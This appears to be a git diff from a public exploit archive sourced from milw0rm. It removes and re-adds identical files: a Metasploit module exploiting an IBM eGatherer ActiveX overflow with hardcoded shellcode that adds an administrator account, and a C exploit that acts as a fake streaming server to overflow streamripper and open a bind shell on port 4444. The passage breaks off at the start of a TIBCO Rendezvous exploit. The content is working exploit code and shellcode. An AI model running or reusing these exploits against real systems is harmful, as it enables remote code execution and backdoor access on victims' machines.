-	          {
-            	    'GETPCTYPE' => 'ebx'
-		  },
-	'Payload'        =>
-	  {
-		'Space'    => 700,
-		'BadChars'  => "\x00\x88\x8e\x89\x83\x96\x98\x91\x80\x9f\x93\x97\x8c\x99\x9c\x9b\x92", # data is downcased				
-		'Keys'     => ['+alphanum'],
-		
-	  },
-	'Refs'           =>
-	  [
-	  	['OSVDB', '27976'],	  
-	  	['CVE', 'CVE-2006-4221'],
-	  	['BID', '19554'],
-	  	['URL', 'http://research.eeye.com/html/advisories/published/AD20060816.html'],
-	  ],
-
-	'DefaultTarget'  => 0,
-	'Targets'        =>
-	  [
-		[ 'Windows 2000 SP4 English version', 0x75041111, 0x7CE8E1B6  ]
-#		[ 'Windows 2000 SP4 English version', 0x41414141, 0x7CE8E1B6  ] test
-#		75032DB6
-#//7CE8E1B6 CALL ole32.dll
-#//75041111 .data WS2_32.DLL		
-	  ],
-	
-	'Keys'           => [ 'ibm' ],
-
-	'DisclosureDate' => 'Aug 16 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-
-sub Exploit
-{
-	my $self = shift;
-	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
-		Listen    => 1,
-		Proto     => 'tcp'
-	);
-	my $client;
-
-	# Did the listener create fail?
-	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
-	}
-
-	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
-		Pex::Utils::SourceIP('1.2.3.4') :
-		$self->GetVar('HTTPHOST');
-
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
-	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
-
-	return;
-}
-
-sub HandleHttpClient
-{
-	my $self = shift;
-	my $fd   = shift;
-
-	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-		
-
-	# Read the HTTP command
-	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
-	my $agent;
-	
-	# Read in the HTTP headers
-	while ((my $line = $fd->RecvLine(10))) {
-		
-		$line =~ s/^\s+|\s+$//g;
-		
-		my ($var, $val) = split(/\:/, $line, 2);
-
-		# Break out if we reach the end of the headers
-		last if (not defined($var) or not defined($val));
-
-		$agent = $val if $var =~ /User-Agent/i;
-	}
-	
-	my $os = 'Unknown';
-	my $vl = ($agent =~ m/Windows/) ? 'Vulnerable' : 'Not Vulnerable';
-	
-	$os = 'Linux'     if $agent =~ /Linux/i;
-	$os = 'Mac OS X'  if $agent =~ /OS X/i;
-	$os = 'Windows'   if $agent =~ /Windows/i;	
-	
-	
-	$self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
-	
-	if ($os ne 'Windows') {
-		$self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
-	} else {
-		$self->PrintLine("[*] Sending payload and waiting for execution...");	
-	}
-
-	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
-
-	$fd->Close();
-}
-
-sub JSUnescape2 {
-	#TODO: add to Pex:Utils:JSUnescape like type of mode
-        my $data = shift;
-        my $mode = shift() || 'LE';
-        my $code = '';
-
-        # Encode the shellcode via %u sequences for JS's unescape() function
-        my $idx = 0;
-
-        # Pad to an even number of bytes
-        if (length($data) % 2 != 0) {
-                $data .= substr($data, -1, 1);
-        }
-
-        while ($idx < length($data) - 1) {
-                my $c1 = ord(substr($data, $idx, 1));
-                my $c2 = ord(substr($data, $idx+1, 1));
-                if ($mode eq 'LE') {
-                        $code .= sprintf('%%%.2x%%%.2x', $c2, $c1);
-                } else {
-                        $code .= sprintf('%%%.2x%%%.2x', $c1, $c2);
-                }
-                $idx += 2;
-        }
-
-        return $code;
-}
-
-
-sub GenerateHTML {
-	my $self        = shift;
-	my $target      = $self->Targets->[$self->GetVar('TARGET')];
-	my $shellcode = JSUnescape2($self->GetVar('EncodedPayload')->Payload, 'RE');	
-        my $offsetdata = JSUnescape2(pack('V', $target->[1]),'R');
-	my $offsetesp = JSUnescape2(pack('V', $target->[2]),'R');
-
-#adduser, user: hax0r pass: vete
-my $shellcode = '%31%c9%66%b9%30%72%51%68%20%68%61%78%68%2f%41%44%44%68%72%65%73%20%68%72%61%64%6f%68%6e%69%73%74%68%41%64%6d%69%68%6f%75%70%20%68%61%6c%67%72%68%20%6c%6f%63%68%20%6e%65%74%68%44%20%26%26%68%20%2f%41%44%68%76%65%74%65%68%78%30%72%20%68%72%20%68%61%68%20%75%73%65%68%20%6e%65%74%68%65%20%2f%63%68%64%2e%65%78%68%41%41%63%6d%31%c0%50%31%c0%8d%4c%24%06%51%bb%fa%74%59%7c%ff%d3%31%c0%50%bb%be%69%47%79%ff%d3';
-#$self->PrintLine($shellcode2);
-#my $shellcode = $shellcode2;
-
-
-	my $data        = qq#
-
-
-	IBM&ISS congratulation
-
-
-
-
-
-
-
-#;
-	return $data;
-}
-
-sub BuildResponse {
-	my ($self, $content) = @_;
-
-	my $response =
-	  "HTTP/1.1 200 OK\r\n" .
-	  "Content-Type: text/html\r\n";
-
-	if ($self->GetVar('Gzip')) {
-		$response .= "Content-Encoding: gzip\r\n";
-		$content = $self->Gzip($content);
-	}
-	if ($self->GetVar('Chunked')) {
-		$response .= "Transfer-Encoding: chunked\r\n";
-		$content = $self->Chunk($content);
-	} else {
-		$response .= 'Content-Length: ' . length($content) . "\r\n" .
-		  "Connection: close\r\n";
-	}
-
-	$response .= "\r\n" . $content;
-
-	return $response;
-}
-
-sub Chunk {
-	my ($self, $content) = @_;
-
-	my $chunked;
-	while (length($content)) {
-		my $chunk = substr($content, 0, int(rand(10) + 1), '');
-		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
-	}
-	$chunked .= "0\r\n\r\n";
-
-	return $chunked;
-}
-
-sub Gzip {
-	my $self = shift;
-	my $data = shift;
-	my $comp = int(rand(5))+5;
-
-	my($wtr, $rdr, $err);
-
-	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
-	print $wtr $data;
-	close ($wtr);
-	local $/;
-
-	return (<$rdr>);
-}
-
-1;
-
-# milw0rm.com [2006-08-29]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::ibm_egatherer;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use Msf::Encoder;
+use IO::Socket::INET;
+use IPC::Open3;
+
+my $advanced =
+  {
+  };
+
+my $info =
+  {
+	'Name'           => 'IBM eGatherer ActiveX Code Execution Vulnerability',
+	'Version'        => '$Revision: 1 $',
+	'Authors'        =>
+	  [
+		'Francisco Amato  [ISR] www.infobyte.com.ar',
+	  ],
+
+	'Description'    =>
+	  Pex::Text::Freeform(qq{
+		This module exploits a code execution vulnerability in the IBM eGatherer ActiveX buffer overflow.
+}),
+        'Arch'           => [ 'x86' ],
+        'OS'    => ['win32', 'win2000' ],
+					
+	'Priv'           => 0,
+
+	'UserOpts'       =>
+	  {
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+
+	  },
+
+        'AutoOpts'  =>
+	          {
+            	    'GETPCTYPE' => 'ebx'
+		  },
+	'Payload'        =>
+	  {
+		'Space'    => 700,
+		'BadChars'  => "\x00\x88\x8e\x89\x83\x96\x98\x91\x80\x9f\x93\x97\x8c\x99\x9c\x9b\x92", # data is downcased				
+		'Keys'     => ['+alphanum'],
+		
+	  },
+	'Refs'           =>
+	  [
+	  	['OSVDB', '27976'],	  
+	  	['CVE', 'CVE-2006-4221'],
+	  	['BID', '19554'],
+	  	['URL', 'http://research.eeye.com/html/advisories/published/AD20060816.html'],
+	  ],
+
+	'DefaultTarget'  => 0,
+	'Targets'        =>
+	  [
+		[ 'Windows 2000 SP4 English version', 0x75041111, 0x7CE8E1B6  ]
+#		[ 'Windows 2000 SP4 English version', 0x41414141, 0x7CE8E1B6  ] test
+#		75032DB6
+#//7CE8E1B6 CALL ole32.dll
+#//75041111 .data WS2_32.DLL		
+	  ],
+	
+	'Keys'           => [ 'ibm' ],
+
+	'DisclosureDate' => 'Aug 16 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+
+sub Exploit
+{
+	my $self = shift;
+	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalPort => $self->GetVar('HTTPPORT'),
+		ReuseAddr => 1,
+		Listen    => 1,
+		Proto     => 'tcp'
+	);
+	my $client;
+
+	# Did the listener create fail?
+	if (not defined($server)) {
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		return;
+	}
+
+	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
+		Pex::Utils::SourceIP('1.2.3.4') :
+		$self->GetVar('HTTPHOST');
+
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
+	while (defined($client = $server->accept())) {
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+	}
+
+	return;
+}
+
+sub HandleHttpClient
+{
+	my $self = shift;
+	my $fd   = shift;
+
+	# Set the remote host information
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+		
+
+	# Read the HTTP command
+	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
+	my $agent;
+	
+	# Read in the HTTP headers
+	while ((my $line = $fd->RecvLine(10))) {
+		
+		$line =~ s/^\s+|\s+$//g;
+		
+		my ($var, $val) = split(/\:/, $line, 2);
+
+		# Break out if we reach the end of the headers
+		last if (not defined($var) or not defined($val));
+
+		$agent = $val if $var =~ /User-Agent/i;
+	}
+	
+	my $os = 'Unknown';
+	my $vl = ($agent =~ m/Windows/) ? 'Vulnerable' : 'Not Vulnerable';
+	
+	$os = 'Linux'     if $agent =~ /Linux/i;
+	$os = 'Mac OS X'  if $agent =~ /OS X/i;
+	$os = 'Windows'   if $agent =~ /Windows/i;	
+	
+	
+	$self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
+	
+	if ($os ne 'Windows') {
+		$self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
+	} else {
+		$self->PrintLine("[*] Sending payload and waiting for execution...");	
+	}
+
+	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
+
+	$fd->Close();
+}
+
+sub JSUnescape2 {
+	#TODO: add to Pex:Utils:JSUnescape like type of mode
+        my $data = shift;
+        my $mode = shift() || 'LE';
+        my $code = '';
+
+        # Encode the shellcode via %u sequences for JS's unescape() function
+        my $idx = 0;
+
+        # Pad to an even number of bytes
+        if (length($data) % 2 != 0) {
+                $data .= substr($data, -1, 1);
+        }
+
+        while ($idx < length($data) - 1) {
+                my $c1 = ord(substr($data, $idx, 1));
+                my $c2 = ord(substr($data, $idx+1, 1));
+                if ($mode eq 'LE') {
+                        $code .= sprintf('%%%.2x%%%.2x', $c2, $c1);
+                } else {
+                        $code .= sprintf('%%%.2x%%%.2x', $c1, $c2);
+                }
+                $idx += 2;
+        }
+
+        return $code;
+}
+
+
+sub GenerateHTML {
+	my $self        = shift;
+	my $target      = $self->Targets->[$self->GetVar('TARGET')];
+	my $shellcode = JSUnescape2($self->GetVar('EncodedPayload')->Payload, 'RE');	
+        my $offsetdata = JSUnescape2(pack('V', $target->[1]),'R');
+	my $offsetesp = JSUnescape2(pack('V', $target->[2]),'R');
+
+#adduser, user: hax0r pass: vete
+my $shellcode = '%31%c9%66%b9%30%72%51%68%20%68%61%78%68%2f%41%44%44%68%72%65%73%20%68%72%61%64%6f%68%6e%69%73%74%68%41%64%6d%69%68%6f%75%70%20%68%61%6c%67%72%68%20%6c%6f%63%68%20%6e%65%74%68%44%20%26%26%68%20%2f%41%44%68%76%65%74%65%68%78%30%72%20%68%72%20%68%61%68%20%75%73%65%68%20%6e%65%74%68%65%20%2f%63%68%64%2e%65%78%68%41%41%63%6d%31%c0%50%31%c0%8d%4c%24%06%51%bb%fa%74%59%7c%ff%d3%31%c0%50%bb%be%69%47%79%ff%d3';
+#$self->PrintLine($shellcode2);
+#my $shellcode = $shellcode2;
+
+
+	my $data        = qq#
+
+
+	IBM&ISS congratulation
+
+
+
+
+
+
+
+#;
+	return $data;
+}
+
+sub BuildResponse {
+	my ($self, $content) = @_;
+
+	my $response =
+	  "HTTP/1.1 200 OK\r\n" .
+	  "Content-Type: text/html\r\n";
+
+	if ($self->GetVar('Gzip')) {
+		$response .= "Content-Encoding: gzip\r\n";
+		$content = $self->Gzip($content);
+	}
+	if ($self->GetVar('Chunked')) {
+		$response .= "Transfer-Encoding: chunked\r\n";
+		$content = $self->Chunk($content);
+	} else {
+		$response .= 'Content-Length: ' . length($content) . "\r\n" .
+		  "Connection: close\r\n";
+	}
+
+	$response .= "\r\n" . $content;
+
+	return $response;
+}
+
+sub Chunk {
+	my ($self, $content) = @_;
+
+	my $chunked;
+	while (length($content)) {
+		my $chunk = substr($content, 0, int(rand(10) + 1), '');
+		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+	}
+	$chunked .= "0\r\n\r\n";
+
+	return $chunked;
+}
+
+sub Gzip {
+	my $self = shift;
+	my $data = shift;
+	my $comp = int(rand(5))+5;
+
+	my($wtr, $rdr, $err);
+
+	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+	print $wtr $data;
+	close ($wtr);
+	local $/;
+
+	return (<$rdr>);
+}
+
+1;
+
+# milw0rm.com [2006-08-29]
diff --git a/platforms/windows/remote/2277.c b/platforms/windows/remote/2277.c
index e5c67af26..d7ebe52c6 100755
--- a/platforms/windows/remote/2277.c
+++ b/platforms/windows/remote/2277.c
@@ -1,189 +1,189 @@
-/*   
- * name:		streamripper  <= 1.61.25 win32 remote exploit
- * 
- * bug by:		Ulf Harnhammar
- * status:		public 
- * exploit:		psylocn
- * payload:		portbind 4444
- * **********************************************************
- * K:\>exploit.exe 80 0
- * [ public-release ]                                            
- *        streamripper  <= 1.61.25 remote exploit               
- *        exploit by psylocn 2006                               
- *        bug by Ulf Harnhammar                                 
- *                                                              
- * [+] server started!                                           
- * [+] server waits                                              
- *                   
- * 
- * go to next shell
- * K:\>streamripper.exe http://127.0.0.1:80
- * Connecting...
- * 
- * on other shell
- * [+] client conneted!                                          
- * [+] exploit send check shell on port 4444 
- *
- * now connect to 127.0.0.1:4444  
-*/
-
-/* #define _WIN32 */  
-  
-#include   
-#include   
-#include   
-  
-#ifdef _WIN32  
-#include   
-#pragma comment(lib, "ws2_32")  
-#else  
-#include   
-#include   
-#include   
-#endif  
-
-/* portbind shellcode port 4444*/  
-unsigned char portbindsc[] =   
-"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
-"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
-"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
-"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
-"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
-"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
-"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
-"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
-"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
-"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
-"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
-"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
-"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
-"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
-"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
-"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
-"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
-"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
-"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
-"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
-"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
-"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";  
- 
-char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
-                   "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7
    \r\n"
-                   "icy-name:Radioseven - www.radio.de\r\n"
-                   "icy-genre:Dance Trance House\r\n"
-                   "icy-url:http://www.radio.de\r\n"
-                   "content-type:";                 //buffer to exploit
-                   
-char part2[] = "\r\n"
-                   "icy-pub:1\r\n"
-                   "icy-metaint:8192\r\n"
-                   "icy-br:CCCCCCC\r\n\r\n";
-                   
-char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp
-
-struct targets {  
-	int	num;  
-	char	name[50];  
-	long	jmpaddr;  
-}  
-target[]= {  
-    { 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp 
-    { 1, "debug [testing] ", 0x41414141 },
-};  
-
-void Usage(){
-	
-	int i;
-	printf("Usage: exploit.exe port target\n\n"				
-			   "Targets:\n\n");
-	for (i = 0; i < 2; i++)
-	{
-		if(target[i].name != 0)
-			fprintf(stderr," [%u] %s\n",i,target[i].name);
-		else
-			break;
-	}
-	exit(1);
-}  
-
-int  main (int argc, char **argv)  {  
-  
-	char *host;  
-	struct sockaddr_in my_addr;
-    struct sockaddr_in their_addr;
-    int sockfd,port,new_sock,sin_size=sizeof (their_addr);  
-	   
-
-	char buffer[3565];	 
-  
-#ifdef _WIN32  
-	WSADATA wsa;  
-#endif  
-  
-
-#ifdef _WIN32  
-	 WSAStartup(MAKEWORD(2,0), &wsa);  
-#endif  
-  
-	printf("[ public-release ]\n");
-	printf("\tstreamripper  <= 1.61.25 remote exploit \n");  
-	printf("\texploit by psylocn 2006\n");  
-	printf("\tbug by Ulf Harnhammar\n\n"); 
-	
-	unsigned long ntarget = 0;
-	if (argc < 3) Usage(); 
-    if ((ntarget = atoi(argv[2])) > 1) Usage(); 
- 
-    port = (unsigned short)atoi(argv[1]);
-
-	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  
-		printf("[-] socket error\n");  
-		return 0;  
-	}
-	
-    my_addr.sin_family = AF_INET;         
-    my_addr.sin_port = htons(port);
-    my_addr.sin_addr.s_addr = INADDR_ANY;   
-	
-	if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {  
-		printf("\n[-] bind error\n");  
-		return 0;  
-	}
-    else printf ("[+] server started!\n");
-    
-    if (listen (sockfd, 3) == SOCKET_ERROR)  {  
-		printf("\n[-] listen error\n");  
-		return 0;  
-	}
-	printf ("[+] server waits\n");
-	
-	if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size))  == INVALID_SOCKET)  {  
-		printf("\n[-] accept error\n");  
-		return 0;  
-	}
- 	else
- 	printf ("[+] client conneted!\n");
-   
-    memset ( buffer, 0x90, sizeof(buffer) - 1 );
-    memcpy ( buffer, part1, strlen(part1) );
-    memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
-    memcpy ( buffer+3150, fixstack,strlen(fixstack) );
-    memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
-    
-    memcpy ( buffer+3515, part2, sizeof(part2) );
-	
-	if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {  
-		printf("[-] send error\n");  
-		return 0;  
-	}
-	sleep(2000);
-    printf("[+] exploit send check shell on port 4444\n");  
-
-	closesocket(sockfd);  
-#ifdef _WIN32 
-  WSACleanup ();
-#endif   
-return 0;  
-} 
-
-// milw0rm.com [2006-08-29]
+/*   
+ * name:		streamripper  <= 1.61.25 win32 remote exploit
+ * 
+ * bug by:		Ulf Harnhammar
+ * status:		public 
+ * exploit:		psylocn
+ * payload:		portbind 4444
+ * **********************************************************
+ * K:\>exploit.exe 80 0
+ * [ public-release ]                                            
+ *        streamripper  <= 1.61.25 remote exploit               
+ *        exploit by psylocn 2006                               
+ *        bug by Ulf Harnhammar                                 
+ *                                                              
+ * [+] server started!                                           
+ * [+] server waits                                              
+ *                   
+ * 
+ * go to next shell
+ * K:\>streamripper.exe http://127.0.0.1:80
+ * Connecting...
+ * 
+ * on other shell
+ * [+] client conneted!                                          
+ * [+] exploit send check shell on port 4444 
+ *
+ * now connect to 127.0.0.1:4444  
+*/
+
+/* #define _WIN32 */  
+  
+#include   
+#include   
+#include   
+  
+#ifdef _WIN32  
+#include   
+#pragma comment(lib, "ws2_32")  
+#else  
+#include   
+#include   
+#include   
+#endif  
+
+/* portbind shellcode port 4444*/  
+unsigned char portbindsc[] =   
+"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
+"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
+"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
+"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
+"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
+"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
+"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
+"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
+"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
+"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
+"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
+"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
+"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
+"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
+"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
+"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
+"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
+"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
+"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
+"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
+"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
+"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";  
+ 
+char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
+                   "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7
    \r\n"
+                   "icy-name:Radioseven - www.radio.de\r\n"
+                   "icy-genre:Dance Trance House\r\n"
+                   "icy-url:http://www.radio.de\r\n"
+                   "content-type:";                 //buffer to exploit
+                   
+char part2[] = "\r\n"
+                   "icy-pub:1\r\n"
+                   "icy-metaint:8192\r\n"
+                   "icy-br:CCCCCCC\r\n\r\n";
+                   
+char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp
+
+struct targets {  
+	int	num;  
+	char	name[50];  
+	long	jmpaddr;  
+}  
+target[]= {  
+    { 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp 
+    { 1, "debug [testing] ", 0x41414141 },
+};  
+
+void Usage(){
+	
+	int i;
+	printf("Usage: exploit.exe port target\n\n"				
+			   "Targets:\n\n");
+	for (i = 0; i < 2; i++)
+	{
+		if(target[i].name != 0)
+			fprintf(stderr," [%u] %s\n",i,target[i].name);
+		else
+			break;
+	}
+	exit(1);
+}  
+
+int  main (int argc, char **argv)  {  
+  
+	char *host;  
+	struct sockaddr_in my_addr;
+    struct sockaddr_in their_addr;
+    int sockfd,port,new_sock,sin_size=sizeof (their_addr);  
+	   
+
+	char buffer[3565];	 
+  
+#ifdef _WIN32  
+	WSADATA wsa;  
+#endif  
+  
+
+#ifdef _WIN32  
+	 WSAStartup(MAKEWORD(2,0), &wsa);  
+#endif  
+  
+	printf("[ public-release ]\n");
+	printf("\tstreamripper  <= 1.61.25 remote exploit \n");  
+	printf("\texploit by psylocn 2006\n");  
+	printf("\tbug by Ulf Harnhammar\n\n"); 
+	
+	unsigned long ntarget = 0;
+	if (argc < 3) Usage(); 
+    if ((ntarget = atoi(argv[2])) > 1) Usage(); 
+ 
+    port = (unsigned short)atoi(argv[1]);
+
+	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  
+		printf("[-] socket error\n");  
+		return 0;  
+	}
+	
+    my_addr.sin_family = AF_INET;         
+    my_addr.sin_port = htons(port);
+    my_addr.sin_addr.s_addr = INADDR_ANY;   
+	
+	if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {  
+		printf("\n[-] bind error\n");  
+		return 0;  
+	}
+    else printf ("[+] server started!\n");
+    
+    if (listen (sockfd, 3) == SOCKET_ERROR)  {  
+		printf("\n[-] listen error\n");  
+		return 0;  
+	}
+	printf ("[+] server waits\n");
+	
+	if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size))  == INVALID_SOCKET)  {  
+		printf("\n[-] accept error\n");  
+		return 0;  
+	}
+ 	else
+ 	printf ("[+] client conneted!\n");
+   
+    memset ( buffer, 0x90, sizeof(buffer) - 1 );
+    memcpy ( buffer, part1, strlen(part1) );
+    memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
+    memcpy ( buffer+3150, fixstack,strlen(fixstack) );
+    memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
+    
+    memcpy ( buffer+3515, part2, sizeof(part2) );
+	
+	if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {  
+		printf("[-] send error\n");  
+		return 0;  
+	}
+	sleep(2000);
+    printf("[+] exploit send check shell on port 4444\n");  
+
+	closesocket(sockfd);  
+#ifdef _WIN32 
+  WSACleanup ();
+#endif   
+return 0;  
+} 
+
+// milw0rm.com [2006-08-29]
diff --git a/platforms/windows/remote/2283.c b/platforms/windows/remote/2283.c
index 4b1ee6bb2..38153e407 100755
--- a/platforms/windows/remote/2283.c
+++ b/platforms/windows/remote/2283.c
@@ -1,422 +1,422 @@
-/*
-Exploit: TIBCO RendezVous remote buffer overflow exploit for Win32 (public version)
-Affected products: Tibco RendezOVous version <=7.4.11 (Multiple Vulnerabilities)
-Author: Andres Tarasco Acuña (atarasco @ sia.es )
-Advisory: http://www.514.es
-Url: http://www.sia.es
-Greetings: Iñaki Lopez and SIA TigerTeam
-Status: vulnerability fixed ( Vendor notification + fixes)
-
-Timeline:
-----------------
-Discovered: March 23, 2006
-Exploit coded: March 24, 2006
-Vendor Notified: March 27, 2006
-Vendor patch: May 15, 2006 - Tibco Rendezvous version 7.5  
-Public Disclosure: who knows
-
-
-Affected daemons:
------------------------
-- TIB/Rendezvous Routing Communications Daemon (add router buffer overflow) (port 7580)
-+ POST /add_router HTTP/1.0
